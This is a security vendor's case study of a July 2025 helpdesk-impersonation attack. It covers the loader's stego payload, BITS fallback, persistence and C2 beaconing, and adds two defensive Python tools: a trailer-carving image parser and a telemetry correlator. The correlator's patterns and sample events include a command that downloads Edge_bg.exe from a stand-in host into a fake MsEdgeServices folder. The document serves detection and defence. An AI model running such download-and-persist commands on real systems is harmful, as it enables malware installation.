Inside an Attack: A Minute By Minute Timeline of Attack Detection & Incident Response
In cyber security, even the most robust technical defences can be undermined by a single successful social engineering attack.
This was the case in July 2025, when a UK-based organisation became the target of a well-planned impersonation campaign. The attacker did not rely on brute force or exploit vulnerabilities in firewalls; instead, they exploited trust - posing as an internal helpdesk contact. Within minutes, this simple deception gave them full remote access to a corporate device.
What followed was a carefully orchestrated attempt to deliver and persist malware using steganographic techniques, privilege checks, and multiple fallback mechanisms. However, thanks to rapid alerts from our MXDR platform, coupled with immediate action from PureCyber’s 24/7 Security Operations Centre (SOC), the attack was contained before it could escalate.
This incident serves as a case study in both the sophistication of modern threat actors and the effectiveness of having a trusted cyber security partner who can provide constant vigilance, rapid response, and expert remediation.
Timeline of Events
A precise timeline highlights just how quickly the attack unfolded - and how rapidly it was detected and contained.
In the span of just 11 minutes, the attacker moved from initial contact to deploying malicious files. Without immediate detection by PureCyber’s SOC, the malware could have established persistence and begun exfiltrating sensitive data.
Technical Breakdown: How the Attack Unfolded
The attacker relied on a PowerShell-based framework to deploy, hide, and persist malicious payloads. The sophistication of this script underscores the evolution of modern attack methods, which blend social engineering with advanced technical tactics.
Key Components of the Attack
Payload Delivery
The attacker began by downloading malicious content from external domains under their control, including a steganographic payload hidden within an image file hosted on one of those domains. Hiding the payload inside an otherwise valid image lets the download pass as ordinary web content to controls that only look at file type, and the image still opens normally, which is why attackers increasingly use this technique to slip past traditional detection.
Privilege Detection
Once delivered, the script checked whether the compromised account had administrative rights by running the net session command, which succeeds only in an elevated context and otherwise returns an "Access is denied" error. This step is critical for attackers, as admin privileges allow malware to disable security tools, install additional payloads, and move laterally within the network. For defenders, net.exe spawned by PowerShell with a session argument is a useful hunting hook, because there is little legitimate reason for a script to test its own privileges this way.
Payload Extraction
The script decrypted and decompressed the hidden data from the image file, dropping the malicious components into a concealed location under APPDATA\MsEdgeServices. By using directory names that mimic legitimate software, attackers increase the likelihood that their files blend into normal system activity and escape casual review; the genuine Edge installation lives under Program Files rather than a per-user AppData folder, and that mismatch is exactly what to look for.
Fallback Mechanism
Recognising that steganographic delivery can fail, the script included a contingency plan. If the hidden payload could not be extracted, it would instead download secondary files, such as Edge_bg.exe and HTCTL32.DLL, using the Background Intelligent Transfer Service (BITS), a legitimate Windows service that attackers abuse because its transfers originate from a trusted system component and are easily overlooked by controls tuned to browser or PowerShell downloads.
Execution & Persistence
The malicious file Edge_bg.exe was then executed, and persistence was established through scheduled tasks or registry Run keys. Either mechanism relaunches the malware at logon or reboot, giving the attacker ongoing access without having to repeat the social engineering that got them in.
Beaconing
Finally, the compromised device began communicating with the attacker's command-and-control infrastructure at an external domain under their control, sending device and user information via HTTP GET requests. This initial check-in typically precedes further malicious activity, such as data theft, ransomware deployment, or the delivery of additional malware strains.
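The extraction step described above only works if the carrier image passes as a normal file, and one common way to build such a carrier is to append the payload after the image's structural end marker, where viewers ignore it. The following Python parser is an added example, not code from the incident or from PureCyber: it walks a PNG or JPEG's real structure and reports anything that follows it, so an analyst can triage a suspect image offline. The page does not say which steganographic method the loader used, so the appended-trailer layout, the sample images and the payload bytes here are all constructed assumptions.

```python
"""Report bytes appended after an image's structural end (a common stego carrier).

Added example, not code from the incident or from PureCyber. The page does not
state how the payload was hidden; the appended-trailer layout checked here, the
sample images and the payload bytes are all constructed for the demonstration.
"""
import struct
import sys
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
SAMPLE_PAYLOAD = zlib.compress(b"constructed payload")  # stands in for the hidden blob


def png_end_offset(data: bytes) -> int:
    """Walk PNG chunks (length, type, data, crc) and return the offset past IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4
        if ctype == b"IEND":
            return pos
    raise ValueError("truncated PNG: no IEND chunk")


def jpeg_end_offset(data: bytes) -> int:
    """Walk JPEG marker segments to SOS, then return the offset past the EOI marker."""
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:  # standalone markers carry no length
            pos += 2
            continue
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen
        if marker == 0xDA:  # SOS: entropy-coded scan data follows
            break
    else:
        raise ValueError("no SOS segment")
    # Inside scan data every 0xFF is stuffed (FF 00) or a RSTn marker, so the first
    # FF D9 after SOS is the real EOI for a baseline JPEG.
    eoi = data.find(b"\xff\xd9", pos)
    if eoi < 0:
        raise ValueError("no EOI marker")
    return eoi + 2


def extract_trailer(data: bytes) -> bytes:
    """Everything after the image proper; empty for a clean file."""
    if data.startswith(PNG_SIG):
        return data[png_end_offset(data):]
    if data.startswith(b"\xff\xd8"):
        return data[jpeg_end_offset(data):]
    raise ValueError("unsupported image format")


def describe_trailer(trailer: bytes) -> dict:
    """Triage the trailer: size, zlib-decompressed content if any, PE header check."""
    info = {"size": len(trailer), "decompressed": None, "looks_like_pe": False}
    if trailer:
        try:
            info["decompressed"] = zlib.decompress(trailer)
        except zlib.error:
            pass
        body = info["decompressed"] or trailer
        info["looks_like_pe"] = body.startswith(b"MZ")
    return info


def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png(trailer: bytes = b"") -> bytes:
    """Constructed 1x1 RGB PNG with an optional appended trailer (demo only)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte + one red pixel
    return (PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat)
            + _png_chunk(b"IEND", b"") + trailer)


def build_sample_jpeg(trailer: bytes = b"") -> bytes:
    """Constructed JPEG skeleton: SOI, APP0, SOS, stuffed scan bytes, EOI (demo only)."""
    app0 = b"\xff\xe0" + struct.pack(">H", 4) + b"JF"
    sos = b"\xff\xda" + struct.pack(">H", 4) + b"\x01\x00"
    scan = b"\x12\x34\xff\x00\x56"  # FF 00 is byte stuffing, not a marker
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + trailer


if __name__ == "__main__":
    # Usage: python stego_trailer.py suspect.png   (no argument runs the built-in sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_png(SAMPLE_PAYLOAD)
    print(describe_trailer(extract_trailer(data)))
```

A non-empty trailer is not proof of malice on its own (some editors leave metadata after IEND), but a trailer that inflates with zlib or starts with MZ is worth pulling into a sandbox, and the offset returned here gives you the exact bytes to carve.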
How the Threat Was Contained
The attack was ultimately thwarted thanks to a combination of proactive defence tools and the immediate action of PureCyber’s 24/7 SOC.
Our internal endpoint detection system triggered alerts when suspicious PowerShell commands executed on the endpoint, flagging the anomaly.
The firewall simultaneously detected attempts to connect to a malicious domain, corroborating that the activity was not legitimate.
PureCyber’s SOC analysts received these alerts in real time, rapidly investigated the activity, and isolated the endpoint to prevent further spread. They also blocked outbound communications to the attacker’s servers.
The suspicious file AuroraVista.zip was quarantined for deeper forensic analysis, ensuring it could not run or propagate across the network.
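The alerts above fired on PowerShell activity and a firewall hit, but each stage of the loader (privilege check, BITS download, the MsEdgeServices drop, persistence, beacon) leaves its own telemetry, and correlating those stages per host inside a short window is what turns single alerts into a high-confidence incident. The following Python is an added example, not PureCyber's detection content: it tags constructed Sysmon-style events against the stages described in the technical breakdown and raises one alert when at least three distinct stages land on a host within fifteen minutes. Host names, paths, the SID and the domain in the sample are made up.

```python
"""Correlate endpoint telemetry into the loader chain described in this writeup.

Added example, not PureCyber's detection content. Fields follow the Sysmon
convention (event_id 1 process create, 11 file create, 13 registry value set,
22 DNS query); hosts, paths, SID and domain in the sample are constructed.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Event:
    host: str
    time: datetime
    event_id: int
    image: str = ""
    parent_image: str = ""
    command_line: str = ""
    target: str = ""  # file path, registry value or queried name, depending on event type


def _is_ps(path: str) -> bool:
    return path.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))


# One predicate per loader stage, kept as data so a new stage is one entry.
STAGES = [
    ("priv_check", lambda e: e.event_id == 1 and _is_ps(e.parent_image)
        and e.image.lower().endswith(("\\net.exe", "\\net1.exe"))
        and "session" in e.command_line.lower()),
    ("bits_download", lambda e: e.event_id == 1 and re.search(
        r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", e.command_line, re.I)),
    ("masquerade_drop", lambda e: e.event_id == 11 and re.search(
        r"\\appdata\\roaming\\msedgeservices\\", e.target, re.I)),
    ("persist_task", lambda e: e.event_id == 1 and "/create" in e.command_line.lower()
        and e.image.lower().endswith("\\schtasks.exe")),
    ("persist_runkey", lambda e: e.event_id == 13 and re.search(
        r"\\currentversion\\run\\", e.target, re.I)),
    ("ps_dns", lambda e: e.event_id == 22 and _is_ps(e.image)),
]


def tag_events(events):
    """Return (stage, event) pairs for every event matching a stage predicate."""
    return [(name, e) for e in events for name, pred in STAGES if pred(e)]


def find_chains(events, window=timedelta(minutes=15), min_stages=3):
    """Alert once per host when enough distinct stages cluster inside the window."""
    by_host = {}
    for name, e in tag_events(events):
        by_host.setdefault(e.host, []).append((e.time, name))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            stages = {n for t, n in hits[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                alerts.append({"host": host, "first_seen": t0, "stages": sorted(stages)})
                break
    return alerts


def _t(hhmm: str) -> datetime:
    return datetime(2025, 7, 1, int(hhmm[:2]), int(hhmm[3:]))  # constructed date


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed telemetry: one victim host, one benign admin host
    Event("WS-042", _t("13:14"), 1, r"C:\Windows\System32\net.exe", PS, "net session"),
    Event("WS-042", _t("13:16"), 22, PS, target="cdn.example.invalid"),
    Event("WS-042", _t("13:18"), 1, PS, PS,
          "powershell -c Start-BitsTransfer -Source http://cdn.example.invalid/Edge_bg.exe "
          "-Destination $env:APPDATA\\MsEdgeServices"),
    Event("WS-042", _t("13:19"), 11, PS,
          target=r"C:\Users\alice\AppData\Roaming\MsEdgeServices\Edge_bg.exe"),
    Event("WS-042", _t("13:20"), 13, PS,
          target=r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\MsEdgeServices"),
    Event("WS-007", _t("09:00"), 1, r"C:\Windows\System32\net.exe",
          r"C:\Windows\System32\cmd.exe", "net session"),  # admin at a shell, no PowerShell parent
    Event("WS-007", _t("09:01"), 1, r"C:\Windows\System32\schtasks.exe",
          r"C:\Windows\explorer.exe", "schtasks /create /tn NightlyBackup /sc daily"),
]

if __name__ == "__main__":
    for name, e in tag_events(SAMPLE_EVENTS):
        print(f"{e.host} {e.time:%H:%M} {name}")
    for a in find_chains(SAMPLE_EVENTS):
        print("ALERT", a)
```

The benign host shows why the parent-process condition matters: an administrator typing net session at a command prompt, or creating a backup task from Explorer, trips one stage at most and never reaches the chain threshold, while the victim host accumulates five distinct stages in six minutes.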
Without a dedicated SOC monitoring systems around the clock, this incident could easily have escalated into a serious breach. The attacker’s ability to gain remote access, deliver hidden payloads, and set up persistence mechanisms meant that even a small delay in response might have given them time to steal sensitive data or deploy ransomware.
Outcome and Lessons Learned
The incident was contained within minutes, but it offers several key lessons for organisations:
Social engineering remains the biggest threat - The attacker gained entry by convincing an employee to authorise remote access, proving once again that human trust is often the easiest door to open. Ongoing employee training and awareness are critical.
Speed is everything in cyber defence - In this case, alerts were raised at 13:21, and the attacker was cut off by 13:25. Without that four-minute response window, persistence mechanisms may have taken hold, making remediation far more complex.
Layered defences work - Endpoint protection, firewall monitoring, and SOC oversight all played distinct but complementary roles. This kind of defence-in-depth model ensures that if one control is bypassed, others can still stop the attack.
The human element in defence is as important as the human weakness in attack - Just as the attacker exploited human behaviour to gain entry, PureCyber’s human analysts provided the critical decision-making needed to interpret alerts, isolate systems, and contain the threat.
24/7 SOC services are essential - Cyber criminals do not keep office hours, and attacks can happen at any moment. Without a trusted partner monitoring systems continuously, organisations risk discovering breaches hours, or even days, too late.
What Can You Do to Prevent Attacks Like These?
While the incident was successfully contained, it highlights several steps that other organisations can take to strengthen their defences and reduce the likelihood of a similar breach:
Cyber Awareness Training
Social engineering relies on exploiting human trust. Regular training helps employees recognise red flags such as unexpected helpdesk contact, pressure tactics, or instructions to install or open unfamiliar software. Simulated phishing and vishing exercises further embed this awareness, and a simple procedural control backs it up: no remote session is granted until the caller has been verified through a ticket or a callback to the published helpdesk number.
Restrict or Remove Unnecessary Applications
Tools such as Microsoft Quick Assist are convenient, but they hand full remote control of a device to anyone who can talk a user through entering a session code and approving the request. If not essential to business operations, these applications should be uninstalled (Quick Assist ships as a Windows optional feature and can be removed with Remove-WindowsCapability), or their use tightly controlled, for example by permitting only the organisation's own remote-support tool through application control.
Harden Endpoint Configurations
Reducing "bloatware" and disabling unused services decreases the potential attack surface. A leaner, better-managed endpoint environment reduces the number of tools attackers can exploit.
Enforce the Principle of Least Privilege
Limiting administrative rights ensures that even if an attacker gains initial access, their ability to escalate privileges and deploy malware is restricted. In this incident the loader's first action was to test for admin rights; a standard-user session forces it down a narrower path and denies it the ability to disable security tooling.
Invest in 24/7 Monitoring and Response
As this case demonstrated, speed is critical. A dedicated SOC service provides constant vigilance, ensuring that alerts are not only generated but acted upon in real time.
By combining awareness, technical hardening, and continuous monitoring, organisations can significantly reduce their risk exposure and increase resilience against sophisticated social engineering campaigns.
Why Every Organisation Needs a Cyber Security Partner
This case underscores the critical truth that no organisation is immune to social engineering. Attackers know that convincing a user to click, download, or authorise access can bypass even the strongest technical perimeter. The real question is not if a breach attempt will occur, but whether it will be detected and contained quickly enough to prevent damage.
For Steatite, the presence of PureCyber’s 24/7 SOC meant the difference between a thwarted attempt and a successful compromise. Within minutes, analysts identified the attack, isolated the threat, and prevented escalation. Beyond technology, it was expertise, vigilance, and decisive action that turned a potential crisis into a manageable incident.
For other organisations, this serves as a powerful reminder: you cannot defend alone.
Cyber security is no longer just about firewalls and antivirus software - it is about having a strategic partner who provides constant monitoring, rapid response, and expert guidance. By investing in services like those provided by PureCyber, organisations can ensure that when attackers strike, they are met with immediate resistance, minimising impact and protecting both operations and reputation.
Is Your Cyber Security Stressing You Out in 2025?
PureCyber Has All The Resources You Need to Stay One Step Ahead.
From free online webinars in our Autumn Webinar Series, to AI threats, essential checklists and landscape reports, we’ve got you covered.
Discover expert-curated insights, tools, and resources to strengthen your organisation’s cyber resilience during the busiest season for attacks. The first webinar in our Autumn Series, Crisis Unfolding: Why Leaders Must Own Incident Response will walk you through the first critical few hours of a cyber incident using a realistic timeline - revealing exactly what you need to know to create an effective incident response plan.
You can explore further details about our Autumn Webinar Series by clicking the button below - three live, consecutive, monthly webinars covering cyber security from different perspectives and led by our expert team of cyber specialists.
How Can PureCyber Help?
The PureCyber team are here to take over the burden of your cyber security and ensure your organisation's data remains secure and well managed, with proactive monitoring and real-time threat intelligence - providing you with a comprehensive and reliable cyber department to support you in all aspects of your security efforts, including: 24/7 Security Operations Centre (SOC) services, Managed Detection & Response (MDR/EDR), Threat Exposure Management (TEM) & Brand Protection Services, and Penetration Testing.
PureCyber is recognised as an Assured Service Provider by the NCSC to offer governance and compliance consultancy services/audits. Contact our team of compliance experts to enquire about our full range of Governance Support - including Cyber Essentials, ISO 27001, FISMA, SOC1 and SOC2 standards.
Get in touch or book a demo for more information on our services and how we can safeguard your organisation with our expert cyber security solutions.
Email: info@purecyber.com Call: 0800 368 9397